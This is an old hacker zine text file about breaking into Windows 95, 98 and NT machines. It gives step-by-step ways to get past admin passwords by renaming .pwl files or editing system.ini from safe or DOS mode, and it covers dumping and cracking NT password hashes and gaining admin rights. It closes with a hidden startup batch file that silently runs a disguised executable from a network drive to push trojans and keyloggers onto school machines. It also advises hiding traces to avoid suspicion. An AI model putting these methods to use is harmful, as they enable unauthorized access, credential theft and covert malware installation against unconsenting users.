
                       :..::..File 5 of 10.::..:
                       :.:.Bypassing Systems.:.:
                       :.:.::..By DemonR..::.:.:

<*> File: General info on breaking into local systems
About: Mainly focuses on Windows 95, 98 and NT.

		  <*>------------------------------<*>

Well well, you've got a system sitting in front of you... but you cant
access it all? Oh well, this likkle file might help.

*** Windows 9x

First the passwords in 9x are so easily gotten past that most system
admins will use some sort of proggie to stop you doing stuff. However 
if you can get past the admins password then, well you can guess, and 
well its easy.

General Aim:- Your aim is 1 of 2 things,

1- Rename c:\windows\admin.pwl to something else
2- Gain write access to c:\windows\system.ini

Why?

Pretty simple realy, if you rename the file well windows doesn't cop on
and it asks you to enter a new password. Doh! The secong method is the
same principal , <system.ini> stores the name of the <.pwl> file, so if
you tell it the <admins.pwl> is <gook.pwl> it wont find it and ask you
to enter a password. 

How?

Well the main way would be to boot into either DOS mode or Safe mode.
From there all the restriction programs have no effect so you can roam
at will.

To boot into safe mode, you can either hold shift down at the start up,
or press F8 just before it says Starting Windows 9x. That gives you a 
menu from which you can choose safe mode. Once in safe mode you can go
to the run in the start menu and then type in:

<notepad c:\windows\system.ini>

and then edit it (see later in the file).

To boot into DOS mode its pretty much the same, 2 common methods, one
press F8 and pick <command prompt only> and it boots up into DOS mode,
the other way is to put in a boot disk before it boots up. It should
boot up in DOS mode. Once there type in:

<edit c:\windows\system.ini>

Now what?

Well once you've got <system.ini> then all you have to do is search for
the password. You should then see something like this
	
        [Password Lists]
	NOBODY=3DC:\WINDOWS\NOBODY.PWL
	ADMIN=3DC:\WINDOWS\ADMIN.PWL
	ANYONE=3DC:\WINDOWS\ANYONE.PWL

Well all you have to do now is change the last bit so it looks like 
this:

	[Password Lists]
	NOBODY=3DC:\WINDOWS\NOBODY.OLD
	ADMIN=3DC:\WINDOWS\ADMIN.OLD
	ANYONE=3DC:\WINDOWS\ANYONE.OLD

Or whatever suits your mood. Just remember the original names so you 
can restore them after your fun, as to not raise suspicion.

Alternately you can, when in DOS, (if your in windows in safe mode 
simply type in <command.com> in the run box) you can type in: 

<rename c:\windows\*.pwl c:\windows\*.old>

and that should do it.

Problems:

Well you could encounter some problems

1- F8 wont work??
Well the admin has probably changed a line in msdos.sys which disables
this key during boot up, use a boot disk instead.

2 - Boot disk wont work??
The admin has probably disabled the availibilty of booting from floppy
in the BIOS. Well then try the F8 key or holding Shift down, if that
doesn't work well there is one thing you can try...

The BIOS:

Well usulay it says how to get into the BIOS on the startup something
like:

Press Del to Enter Setup

Or

Press F* to Enter Setup

Well just do as it says. Although I have seen some compaqs cover up the
screen which tells you which button to press, so just try F* or Del
etc. If you get in without a password well you can change where the
machine boots up from, usualy you pick from a sequence, e.g C, A, SCSI
or A, C, ZIP. You want the A first, ie the floppy drive.

P.S careful of the BIOS it can fuck up stuff easily.

*** Windows NT
               
Well its way more secure than 9x, but thats not hard. Its still
possible to break into NT. Unlike 9x, in NT you actully have to crack
the passwords and not just rename them. So first you have to get
them... There are a few programs availible for dumping NT passwords
from the registry. e.g L0phtcrack, or NTdump which is availble from my
site <www.newbiehack.8m.com>. But theres a problem about that... you
need admin status to gain access to the registry, hmmmm. How do u get
admin status? well of course there are exploits availible, from my web
site, and loads of other places :-) which lets guests have admin
status. Once an admin, you can dump the passwords from the registry
and crack them using NTcrack, or l0phtcrack, the second is better, as
it has everthing combined into one.

I can't get admin status :-(

Well... there is a program going around that is hard to find, but
once you have it, you can do anything. its called NTFSDOS.exe and what
it lets you do is have access to the NT drive from DOS. so you can boot
up of a DOS floppy and run this. And since it is accesses the drive, it
ignores the file permissions... and you can get the registry file or 
the password file... and then just crack it.

Network stuff. If your school or whatever has a network. when you get
admin status you can wreak havoc on the network. e.g. Usualy the server
has a drive mapped on every machinge e.g I:\ or something. Well. Say 
you put a program on every machine you go to. Just a small batch file.
You put in the start up. and what the program does is. runs a program 
on the mapped drive. Then you can update all your trojans, key loggers
etc remotely, hahaha for e.g You have every machine (or most) running a
file called update.bat every time they start up. Update.bat could be:

	@echo off
	copy I:\winnt\system\net5.dll c:\
	ren c:\net5.dll c:\updateme.exe
	updateme.exe > nul        <--------- The > nul means it doesnt 
        del /y c:\updateme.exe            print anything on the screen.

Well then you make a program to install your newest key logger, go to
the file server and put it on the i: drive under the name net5.dll of
course you have to have access to the main machine, but if you can get
the password file etc. and you have admin status the its easily done.
Some machines let you write to them as guest so take advantage of this.
Its possible to control *your* network with just batch files. Ask GPF#2
:-) he did it...

Well the above info isnt very exact, but hopefully you will take the
initave to work out how break into networks etc from the above.

                          demonr@Phreaker.net
                        http://newbiehack.8m.com

                       :..::..End Of File..::..:
